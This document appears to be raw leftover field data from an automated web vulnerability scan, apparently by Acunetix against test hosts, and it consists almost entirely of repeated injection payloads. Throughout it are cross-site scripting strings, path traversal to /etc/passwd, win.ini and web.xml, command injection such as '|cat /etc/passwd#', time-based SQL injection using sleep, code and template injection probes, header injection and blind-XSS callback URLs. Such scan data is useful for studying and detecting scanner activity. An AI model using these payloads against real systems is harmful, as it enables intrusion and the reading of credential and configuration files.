..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

-1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996324)>

|dir

-1)

'"()

'

1<img src=xyz OnErRor=prompt(998027)>

1

1

1

file:///etc/passwd

'|dir

1

-1))

1

"

acunetix_wvs_invalid_filename

1

http://hitdnCHQjMfn5.bxss.me/

1<img/src=">" onerror=alert(939324)>

1

1

${@print(md5(acunetix_wvs_security_test))}

"|dir

/\../\../\../\../\../\../\../etc/passwd

IpEV5FZE'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(999092)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

WEB-INF/web.xml

http://www.acunetix.tst

1

comments

gk44FFRN')

1

1

'"

1

1&lt

1

Ajs5xw9X'))

comments/.

WEB-INF\web.xml

1

<!--

1'"()&%<ScRiPt >prompt(921193)</ScRiPt>

1

\xf6<img acu onmouseover=prompt(912122) //\xf6>

1

1

1

1

1

1

1<input autofocus onfocus=prompt(937604)>

'"()&%<ScRiPt >prompt(987122)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1_959919

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../boot.ini

response.write(9305298*9259869)

1

1

1

1

'+response.write(9305298*9259869)+'

1_uogwK <ScRiPt >prompt(959379)</ScRiPt>

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini.jpg

1

1

"+response.write(9305298*9259869)+"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

cat /etc/passwd

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

${99363+100088}

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1&n901365=v943028

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

acu2253\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2253

1

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

acux7769\xc0\xbez1\xc0\xbcz2a\x90bcxuca7769

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

)

"|"ld

1

WEB-INF\web.xml

1

-1

1

1<ScRiPt >prompt(925763)</ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1)

1

1

!(()&&!|*|*|

1

-1))

1<script>prompt(986430)</script>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

R22s6NMD'

1

1

1

'

^(#$!@#$)(()))******

cEcrDTpD')

1<ScRiPt >prompt(945646)</ScRiPt>

1

1

/etc/passwd

1

1

1

1

drtBw9jC'))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913743></ScRiPt>

"

-1

1

1

1

1<ScRiPt >prompt(995654)</ScRiPt>

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'"()

'

1

||cat /etc/passwd

1

1

1

-1))

1<video><source onerror="javascript:prompt(934917)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985064)"></g></svg>

8b6TleDl'

1

&dir

1

acunetix_wvs_invalid_filename

5VhSVhzf')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1<div style=width:expression(prompt(936942))>

1

EsBItESs'))

1

http://hit45MgxWCJhs.bxss.me/

comments

'&dir&'

1

1<iframe src='data:text/html

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

1

1

"&dir&"

1<body onload=prompt(925108)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

1

1

file:///etc/passwd

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910997)>

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1<img src=xyz OnErRor=prompt(967570)>

1

1

1

'"

1

1

1

"|dir

WEB-INF/web.xml

1<img/src=">" onerror=alert(935993)>

1

<!--

1

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(958036)</ScRiPt>

1

1

1<ScRiPt%20>prompt(965137)</sCripT>

../../../../../../../../../../windows/win.ini

1

'"()&%<ScRiPt >prompt(941636)</ScRiPt>

1

1&lt

1

1

1

1

1

1_925050

../../../../../../../../../../boot.ini

response.write(9980738*9641000)

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

\xf6<img acu onmouseover=prompt(966838) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

'+response.write(9980738*9641000)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<input autofocus onfocus=prompt(984648)>

1

'&cat /etc/passwd&'

"+response.write(9980738*9641000)+"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"&cat /etc/passwd&"

[url=http://www.acunetix.com]website security[/url]

1

1

................windowswin.ini

1

1

1_bM6on <ScRiPt >prompt(914990)</ScRiPt>

cat /etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

acu9405\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9405

..\..\..\..\..\..\..\..\windows\win.ini

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

acux8799\xc0\xbez1\xc0\xbcz2a\x90bcxuca8799

|cat /etc/passwd#

1

-1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

-1)

1

1<ScRiPt >prompt(967209)</ScRiPt>

'|'ld

1

../../../../../../../../../../etc/passwd.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${100341+99955}

1

1<script>prompt(907094)</script>

1&n960558=v953630

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1

1<ScRiPt >prompt(908064)</ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

f4EKPNDJ'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?970074></ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

n2WJIkte')

1

WEB-INF/web.xml

1<ScRiPt >prompt(931446)</ScRiPt>

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'"()

1<video><source onerror="javascript:prompt(988469)">

UZiRL3r3'))

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958815)"></g></svg>

^(#$!@#$)(()))******

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

-1

1

/etc/passwd

"

1

1<div style=width:expression(prompt(954307))>

1

-1)

1

1

1

1

-1))

1<iframe src='data:text/html

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

1<body onload=prompt(942160)>

&dir

'

1

JBQeKChn'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905787)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

9fXWH9xh')

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=xyz OnErRor=prompt(982007)>

1

E6QU8O9Y'))

"&dir&"

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitwbZ9aXks5D.bxss.me/

1

1<img/src=">" onerror=alert(947168)>

1

1

comments

file:///etc/passwd

1

|dir

1<ScRiPt%20>prompt(960728)</sCripT>

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

comments/.

1

1

1

'"

'|dir

WEB-INF/web.xml

1

1

\xf6<img acu onmouseover=prompt(965786) //\xf6>

1'"()&%<ScRiPt >prompt(992013)</ScRiPt>

<!--

WEB-INF\web.xml

1

1

"|dir

'"()&%<ScRiPt >prompt(994454)</ScRiPt>

1

1

response.write(9960816*9606662)

1

1

../../../../../../../../../../windows/win.ini

1

1_944284

'+response.write(9960816*9606662)+'

1

1

1

1<input autofocus onfocus=prompt(989396)>

1

1

../../../../../../../../../../boot.ini

1

"+response.write(9960816*9606662)+"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

&cat /etc/passwd&

1

[url=http://www.acunetix.com]website security[/url]

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1_9xeBN <ScRiPt >prompt(918635)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

1

acu9345\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9345

1

1

1

1

acux9908\xc0\xbez1\xc0\xbcz2a\x90bcxuca9908

1

1

../../../../../../../../../../etc/passwd.jpg

1

${99927+100344}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

|cat /etc/passwd#

1<ScRiPt >prompt(913625)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<script>prompt(927020)</script>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&n959180=v962105

'|'ld

1some_inexistent_file_with_long_name%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt >prompt(977338)</ScRiPt>

!(()&&!|*|*|

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979298></ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(908895)</ScRiPt>

WEB-INF/web.xml

testasp.vulnweb.com

-1)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF\web.xml

1

1

1<video><source onerror="javascript:prompt(950324)">

1

1

'"()

-1))

'

1

1

/etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977722)"></g></svg>

1

1

o2PMJFfE'

1

1

1

"

YSqgnvFw')

1

1<div style=width:expression(prompt(933887))>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

2h5zuw17'))

1

1<iframe src='data:text/html

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

1

1<body onload=prompt(963053)>

acunetix_wvs_invalid_filename

-1)

&dir

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://hitKV3OBhrx6q.bxss.me/

'&dir&'

-1))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935052)>

comments

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

RKaKMsaE'

${@print(md5(acunetix_wvs_security_test))}\

comments

"&dir&"

1<img src=xyz OnErRor=prompt(997097)>

file:///etc/passwd

1

kapU77aZ')

1

1

1

1<img/src=">" onerror=alert(945622)>

comments/.

1

fpynB9Xt'))

1

1<ScRiPt%20>prompt(930060)</sCripT>

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1&lt

WEB-INF/web.xml

1

http://www.acunetix.tst

1

1

'|dir

1

1

WEB-INF\web.xml

\xf6<img acu onmouseover=prompt(972977) //\xf6>

1

1

1

'"

1<input autofocus onfocus=prompt(995297)>

1'"()&%<ScRiPt >prompt(916955)</ScRiPt>

../../../../../../../../../../windows/win.ini

"|dir

1

<!--

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(957738)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1_934620

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1_Ouaoo <ScRiPt >prompt(925574)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1

1

WEB-INF/web.xml

1

1

acu6862\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6862

1

1

WEB-INF\web.xml

1

acux6425\xc0\xbez1\xc0\xbcz2a\x90bcxuca6425

1

1

1

1

1

1<ScRiPt >prompt(909063)</ScRiPt>

1

1

1

1

1<script>prompt(941206)</script>

1

1

1<ScRiPt >prompt(957790)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982993></ScRiPt>

1

1

1<ScRiPt >prompt(951368)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(920786)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977402)"></g></svg>

1

1

1<div style=width:expression(prompt(958719))>

1

1

1<iframe src='data:text/html

1<body onload=prompt(994101)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(940108)>

1<img src=xyz OnErRor=prompt(975333)>

1

1<img/src=">" onerror=alert(945568)>

1<ScRiPt%20>prompt(920647)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(979456) //\xf6>

1

1<input autofocus onfocus=prompt(938262)>

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_GCu7s <ScRiPt >prompt(981463)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1